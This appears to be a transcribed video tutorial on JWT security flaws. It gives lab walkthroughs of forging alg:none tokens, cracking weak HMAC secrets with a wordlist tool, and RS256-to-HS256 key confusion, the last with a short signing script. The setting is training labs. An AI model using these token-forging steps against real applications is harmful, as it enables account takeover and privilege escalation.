Okay, so thank you so much. We'll talk about the few attacks on basis of the JWT now. Okay, first we'll see this one. Okay, thank you. We have just got the information about the JWT token, how the token is constructed. Hello friends, so now I'm going to talk about issues of JWT tokens. The first vulnerability you can say I'm going to talk about is non-hashing algorithm. Okay, non-hashing algorithm. Let me explain you about this vulnerability first of all. Okay, so this attack described when an attacker alters the token, okay, and changes the hashing algorithm to indicate through the none keyword. Okay, through the none keyword that the integrity of the token has already been verified. Okay, verified. Let me explain you in a very easy way. Okay, basically libraries treated token signed with the none algorithm as a valid token with a verified signature. So an attacker can alter the token claims and token will be trusted by the applications. Okay. Many, let's say, if you're using a Node.json web token, PWJWT, Nancy Jones, PHP JWT, so these are the token implementations have many libraries with critical vulnerability, allowing attacker to bypass the verification steps. The same two flaws were found across many implementation and languages. Okay. JWT have generally three parts: a header, a payload, and a signature. The header identifies which algorithm is used to generate the signature and looks something like this one. Okay. Like header will be, so JWT have three main parts. What is the main part? They first have a header, okay, and the second have payload, okay, and then have signature, okay. So the header generally have algorithms H256 type JWT. Payload have logged in as admin, and there will be a column that we wish to make, okay. The JWT space we include the timestamp and the IIT short for issued at, okay. Signature is calculated by base 64 URL encode the header and payload and converting with the period as a separator, okay. So basically, none algorithm is a curious addition to JWT. It is intended to be used for situations where the integrity of the token has already been verified. So what if I use algorithm none instead of H256? For example, if the header sequence is this one, okay? Let me talk about the header sequence. How the header sequence will be this one. Header will be like this one. Header, and there will be curly bracket, and there will be algorithms in the double quote sequence. Let's say algorithm, and there will be colon, and the value will be, let's say, HS256, okay, and there will be type of, okay, the type will be in the double quote, let's say TYP. I'm just giving the situations, okay, type, and it will be JWT, okay. This is normal. Now right now it's a 256 bit, okay. Now what if so none algorithm so what if some libraries treated token signed with the none algorithm as a valid token, okay. Now what if algorithm instead of this SS256, what if I'll give none? Putting together such a token is easy, yes, and modify the example header to contain none instead of HS256. Make any desired changes to the payload and use an empty signature, okay, and then it will be bypassed, yes. So this one was the situations, okay. Now we'll talk about something else, okay. This one was the non-hashing algorithm techniques, okay. So how to prevent the first use a JWT library that is not exposed to this vulnerability, non-vulnerability, okay. If it's exposed, then your token validation, it will be token validate, okay, bypass token validation, okay. Now there is another vulnerability. Second issue, you can say token side jacking, okay, token side jacking. So what is token side jacking? Attack occurs when a token has been intercepted or stolen, okay, stolen by an attacker, like a proxy server, you can say, attacker, and then they will use it to gain access to the system using targeted user identity. What does that mean basically, using targeted user identity? Let me explain you using what does that mean basically. Basically, what if the payload will contain, let's say the payload will contain as assume there is a sign up, okay, there is a authenticator, okay, and there is a role defined, okay, and the role is, let's say, user, normal user. And what if I'll capture and what if I'll modify the role, the user, to the admin? So I'll be able to use elevate the privilege. Yes, yeah. So this is a way, okay, to explain now. Now there is another issue, third issue. It's called no built in token revocation, okay, revocation by the user. Third issue, the problem is inherent to JWT, because a token only becomes invalid when it expired. Yes, when it expires, the user has no built-in feature to explicitly revoke the validity of token. Okay, the user has no built-in feature to explicitly revoke the validity of token. Yeah, that means that if it is stolen, a user cannot revoke the token itself, thereby blocking the attacker. Yes, so it will be obviously, yes, it will be authorization bypass, access bypass. Yes. Now, now we'll see token information disclosure. The fourth issue is token information disclosure. Okay, this attack occurs when an attacker has access to a token, okay, and extracts information stored in it. Maybe the contents of JWT tokens are base64 encoded, but it's not encrypted by default. Okay, so in order to obtain information about the system, information can be, for example, the security roles, login format, etc. Yes, so you can decode the base64 and you may get sensitive information. That was the vulnerability. Okay, now we'll see token storage on a client side. The fifth issue is token storage on client side. Okay, client side. This occurs when an application stores the token in a manner exhibiting the following behavior. Okay, following behavior. Let me talk about all the behavior one by one. The first behaviors: automatically sent by the browser, maybe in cookie storage. Okay, so if it is storing in the cookie storage, there is a vulnerability. Yes. Second, retrieve even if the browser is restarted from the local storage container. Okay, from the local storage container. Okay, now retrieve in case of XSS issues. Cookie accessible to JavaScript code or token stored in browser, then there is a vulnerability. Okay, so there should be token accessible, you can say, in case of XSS, then there is a vulnerability. Yes, so this one is one issue. Okay, and there is a last one. It's sixth one is called weak token secret. Okay, weak token secret. When the token is protected using an HMAC based algorithm, the security of the token is entirely dependent on the strength of the secret used with the HMAC. If an attacker can obtain a valid JWT, they can carry out an offline attack and attempt to crack the secret using tools such as John the Ripper or Hashcat. Okay, if they're successful, they would then be able to modify the token and re-sign it with the key they had obtained. This could then escalate their privilege, comprise other users' account, or perform other action depending on the contents of JWTs. So make sure it's not. Okay. Thank you so much. Hello friends, so now I'm going to talk about JWT non-algorithm. Yes, and that's a very impactful vulnerability. Okay, so let me show you. Right now I'm logged in as a user. Okay, welcome user agent. Okay, now and what's the pattern you know? Okay, so let me tell you what is JWT non-algorithm. First of all, JWT supports a non-algorithm for signature. Okay, for signature, this was probably designed, okay, or introduced, you can say introduced to debug applications. However, this can have a severe impact on the security of the application. None algorithms have many variants. The first variant is none, second variant is none, third variant is NONE capital, fourth one maybe N capital ONE. Okay, to exploit this vulnerability, you just need to decode the JWT. Okay, just decode JWT and change algorithm used for signature. Okay, and then you can submit your new JWT. Okay, but remove signature. Okay, signature, this won't work unless you remove the signature. So let me show you. When I logged in, inspect element, I'm going to the inspect element. You can go to the storage, or you can even capture the request. Let's say I'm going to capture the user request proxy. Let's go to the intercept is on, proxy, authenticate. So when I capture the request, let's right click. I'll click on the do intercept, or else you can send this to repeater. Let's go to the repeater. When I went to the repeater, it generated one access token, and this is nothing but a JWT. Okay, so I'll copy this one. Okay, you can even go to the jwt.io to pattern, to analyze the pattern. Okay, let's submit this encoded input over there. And when I analyze it, this first one is header info algorithm token type. Okay, type JWT, algorithm is HS256. That means HS256 is nothing but HMAC using SHA-256. That is the required one. Okay, it's the symmetric encryptions. Now I want to change this algorithm. So this is the first one is a base 64. So what I'll do now, I'll capture this. Okay, I'll copy this one. Let's go to the Bubsuit. You can use a decoder option even. Okay, I'll paste over there. Let's decode as a base 64. So when I decode it, it's a HS256. Now I want to change this to none. Okay, so let's none. Let's again encode as a base 64. But you got some equal to. Okay, so do one thing. Let's put some space. Okay, perfectly all right. So this is a first part. So we constructed the header. Okay, let me do one thing. We constructed the header. Okay, now after header, payload. Now this is the payload data. The second one is second dot after the is a payload data. Okay, and now I want to see, I'm logging as a user 1. Now I'll change this identity to 2 for demonstration purpose. Now the data change, I'll copy this one. Okay, and I don't need signature. Okay, so that's fine completely. Okay, so this is the signature. I'm not giving anything. Signature is a blank now. Okay, so after dot I'm not giving anything. So this is the new forged token. Okay, now let me use this token, forged token. So I'll go to the browser. Right now I'm authenticated as user 1. If you click on the admin, you'll get to know you are authenticated as user 1. Now right click, inspect element, go to the storage, local storage, click on this, and access token, and the value is there. Just replace this value with our forged token, then click on the admin, and you can see you're logged in as user 2 now. Now I want, let's say, user 3, so I'll identity 3. Okay, and this is the second one. Let me go to the Sublime. Okay, let's remove this one. Dot and the second payload data, and after that signature is blank, so I just keep blank. Okay, so I'm using a user 3 now. Let's copy this one. Okay, let's go to the Firefox, then storage, and then I'll replace this value with this one. And I don't know if user exists or not. Okay, let's admin welcome important. So user 3 is there. Okay, like this you can try. Okay, So this is nothing but a JWT null cipher, okay? No, it's nothing but null algorithm, okay? So this is a way to do this. Thank you. Hello friends. So now I'm going to talk about JWT weak secret used as a key, okay? Yeah, it's recording perfectly, all right. So basically, when the token is protected using an HMAC-based algorithm, the security of the token is entirely dependent on the strength of the secret used with the HMAC, okay? And if an attacker can obtain a valid JWT, they can then carry out an offline attack to attempt to crack the secret using tools such as John the Ripper or Hashcat, anything, yes? So, let me show you. First, I will start a lab, so you can go to the SKF labs directory. After that, go to CD, JWT, then there's a secret directory, okay? Secret, go to there. Then ls pip3 space install space -r requirements.txt. After that, python 3 space jwt.py, okay? This way you can run the application, but make sure you change the file and make sure you change the IP address, okay, there, okay? Now, so I got one IP address. Now let me authenticate. So I authenticated myself. Now when I authenticated myself, it generated one key. You can also check in Bubsuit. Let's capture the request, authenticate. So when you authenticate, they're sending username admin and the admin and do intercept response to this request, okay? Perfect. Let's forward, and you got access token. Let's copy this access token. So now copy this access token. They may use a weak token secret, okay? Weak token secret. You can also say the weak token secret, okay? Now I have to crack this weak token secret. So there is one tool called JWT cat. You can install this JWT cat, okay, by this method. After the installation, you can launch this. Let me show you how to launch this. Okay. Okay. Let me do PWD. Okay, I'm not in the JWT. Let me go to the PWD. Okay, yes, I'm in the JWT cat. Now you can see there's a JWT cat.py. You need a word list. So I have a word list. Okay, for demonstration, I just have this 5 word. Okay, you can use a John the Ripper. You can use rocku.txt. Okay, it's up to you. Okay, now Python space JWT Python 3 space JWT cat.py space -t in double quote. You can give the token perfectly. After that, you can give -w and the word list. So word list is in users directory. You can give offensive hunter. This is my directory, so I'm just giving offensive hunter desktop, and then JWT tool, then JWT cat, and after there's a word.txt. Okay, just so you can see you got a key. Secret key is secret. So weak token secret, and weak token secret key is a secret. Okay, now perfectly all right. So we got a secret. Now we can go to the jwt.io. Let's go to the jwt.io now. jwt.io, perfectly all right. And there you can embed, okay? So you can directly get this one, perfectly all right. Now your 256-bit secret, so it's just a secret, okay? SECRET spelling is correct. Let me check. Yeah, it's perfectly all right. Now this identity to make 2. Okay, we got a new token. Let's copy this token. Now I'll go to the browser and I'll replace this value. Right now I am let's authenticate myself. Okay, let's authenticate myself, and then user ID 1. Okay, now I'll do one thing. I'll replace this value with this one. Perfect. Let's show user ID. See, now user ID 2. So this is a way to do attack weak token secret. Okay, I hope it's clear. Thank you. Hello friends, welcome back. So now I'm going to talk about JWT signature RS256 to HS256. What is this basically? Let me talk about first of all. Because the public key can sometimes be obtained by attacker, yes, the attacker can modify the algorithm in the header to HS256 and then use the RSA public key to sign the data. Basically, the algorithm HS256 uses the secret key to sign and verify each message, okay, but the algorithm RS256 uses the private key to sign the message and uses public key for authentication. Okay, now, so how to get off public key? It's very easy. Copy server certificate and extract the public key. Sometimes it will be very easy for attacker. How? You can use OpenSSL S client connect, and then you can give host name, okay, then OpenSSL x509 -in cert.pem, that's public key no auth, and then key.p. This is a syntax, okay. This is a two command to get public key, okay. Now, so I have a lab now, okay. You can use this lab JWT demo, okay. The link is this one, the lab link, okay, this link, or you can directly use the public key link. When you will go to this JWT demo, you'll find there is RS256, okay. Just open this one. The attack is change the algorithm from RS256 to HS256 and use the public key, okay. Public key as a secret key for the HMAC, okay. No worry. So let's observe this one, okay. Let's copy this one. So I just copy that one. Now I'll go to the jwt.io and there I'll simply paste the encoded data, okay. So you can see algorithm is RS256 and the data is this one, okay. Perfectly alright. Now and they are using a public key and the private key, okay. Now what I'll do, I'll make my tool, okay. So let me make a tool first, okay. So the tool is this one, cat tool.py. I'm just showing you, okay, what's the tool. Tool is very simple. Import, first line will be this one, import JWT, okay. The second line will be public equal to open public.pem r.read, okay. This will be the second line. Then print public, you can print public. After that, print JWT encode, okay. And there you can give your data. The data will be this one. Let's say this one. This is the data, okay. So you can give this data, okay. In the curly bracket, this will be your data, okay. Now, so I just give a sample data test, okay. Not an issue. So we have a tool now. Let me copy this one and I'll save as tool name. Let's say clear nano space t.py, okay. Perfectly alright. Let's save this cat t.py. So you can see we have a tool now. Import JWT public open public.pem. So this public key should be in the same directory. So this is a lab, so you can download this public key directly, okay. So public key there, you can directly download. So you can see I have a public key now directly, public.pem, perfectly alright. Now I have to give a perfect, I think correct JWT token there, okay, after converter. Now, so what I'll do, let me use this. So I'll use this tool. It's very easy to use, but for that you need a requirement, okay. One requirement is you have to install pip space install space pi jwt equal to 0.4.3. Okay, that's the requirements. Otherwise, it won't work. Now, it's very easy. You can use Python space t.py. Okay, you can directly use t.py, and then you'll get a directly token. If you'll observe this token correctly, you can see what's inside this token. Let me observe. So I'm observing this token. This token have HS256 type JWT data test, and we use that public key. Now let me submit this one. If you submit this, you can see it's correct one. Okay, valid JWT. So this is a way you should convert RS256 to HS256. Thank you so much.